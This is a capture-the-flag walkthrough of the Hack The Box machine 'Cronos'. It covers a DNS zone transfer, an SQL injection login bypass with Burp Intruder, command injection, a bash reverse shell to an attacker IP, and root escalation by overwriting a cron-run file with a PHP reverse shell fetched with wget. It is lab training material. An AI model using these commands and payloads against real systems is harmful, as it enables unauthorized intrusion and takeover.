HTB - Cronos

Linux | DNS | dig | SQLi | cron

Tools For This Room

• dig - Domain Information Groper - allows interaction with Domain Name Servers - more information and examples here

• List of SQLi inputs - https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b

TL;DR / Executive Summary

1. Scan and enumerate with nmap and dig

2. Gain foothold through SQLi

3. Privesc using cron job

Scanning & Enumeration

Let's start off with the usual nmap scans.

• nmap

nmap -sV -sC -vv <IP>

We get 3 open ports: 22: SSH 53: DNS 80: HTTP

Checking out port80 only yields the default Ubuntu page.

Port53 is open which is unusual, since it's usually UDP 53 which is open and not TCP 53. Let's try to enumerate it using dig (Domain Information Groper) to see the mappings of the IP to domain names. But first let's add "cronos.htb" to the /etc/hosts folder.

sudo gedit /etc/hosts
<IP> cronos.htb

dig is a tool which allows us to interact with DNS name servers to get information. Check out this article by Linuxize for a detailed explanation along with some example commands.

dig axfr @<IP> cronos.htb

Here we see the one server having multiple domain names: cronos.htb, admin.cronos.htb, ns1.cronos.htb, www.cronos.htb. Let's add all of these to our /etc/hosts file.

Checking out all the new domain names yield nothing except admin.cronos.htb which gives us a login page:

Gaining Foothold

After trying the usual default logins such as admin/password, we can give SQL injection a shot. This is definitely a trial-and-error method which is tedious in nature, but we have no credentials and the other domains don't seem too promising. Ismail Tasdelen has put together a fairly comprehensive list of injections we can try here. We'll copy all the input under the section titled "SQL Injection Auth Bypass Payloads", and paste them into a .txt file.

gedit SQLi_Auth.txt
// paste input into this file //

Let's use Burp to try out the different SQLi inputs. Once we've started up Burp, turn on FoxyProxy and click "submit" on the login page. Switching to Burp, we'll notice that the "Proxy" tab has now turned orange, and if we click on it, we'll see a page like this:

Right click and select "Send to Intruder". Now we'll notice that the tab "Intruder" to the right of "Proxy" is highlighted in orange too. Head over to "Intruder" and we'll notice a similar output, except some fields are highlighted in purple. Click on the "Clear §" button to the right of the page, and the purple fields will be removed. Now place the cursor after "username=" and click "Add §" twice. This creates the field which we will input the SQLi.

Let's switch over to the "Payloads" tab to upload our SQLi inputs. Under Payload Options, click "Load..." and upload the .txt file which we made earlier. We'll see the list populated here:

Now we're all set, let's hit the shiny orange button "Start attack". After awhile, Burp would have tried all the inputs as usernames to see which works. We're able to see this from the "Status" column. Those which provide a status code of 302 are likely candidates.

Returning to the login page on our browser, we can turn off FoxyProxy. Now to try the SQLi which had a 302 status code, while leaving the password blank.

Looks like it works, and we're in.

Since this site has a track record of not sanitizing user input, let's try appending commands to the IP address. Let's start with this:

; id

We get the following, which confirms our assumption.

Let's start by setting up a netcat listener:

nc -lvnp 4444

Now we append and execute the following command:

; bash -c 'bash -i>& /dev/tcp/10.10.14.23/4444 0>&1'

We get our shell:

Navigating the directories, we find the user.txt

Privilege Escalation

We try the usual privesc checks such as SUID and history, but nothing comes up. However, as the name of this room suggests, we find an interesting file in /etc/crontab.

The columns stand for minute, hour, day of month, month, and day of week respectively, and the asterisk represents a wildcard. As such, the file called artisan will run every minute of every day. As a rule of thumb, files which are set to run on very short intervals such as every 5 minutes or so should set off alarm bells when looking to privesc. Let's navigate to the file called artisan to see if we can modify it.

Looks like we have write permissions which is great. We try to open artisan with nano and gedit, but neither of those work. So let's just import a reverse shell and overwrite artisan. We can get a reverse shell from Pentestmonkey here, and edit the file to reflect our IP.

We get a server going on our attacking machine:

python -m SimpleHTTPServer

Now let's use wget to grab our reverse shell:

wget <ourIP>:<port>/<reverseshell.php>

We then get a netcat listener going on our attacking machine:

nc -lvnp <port>

Lastly, we overwrite artisan with our reverse shell:

cp <reverseshell.php> artisan

Within the minute, we've gotten our root shell!

Grab that sweet root.txt flag and pat yourself on the back.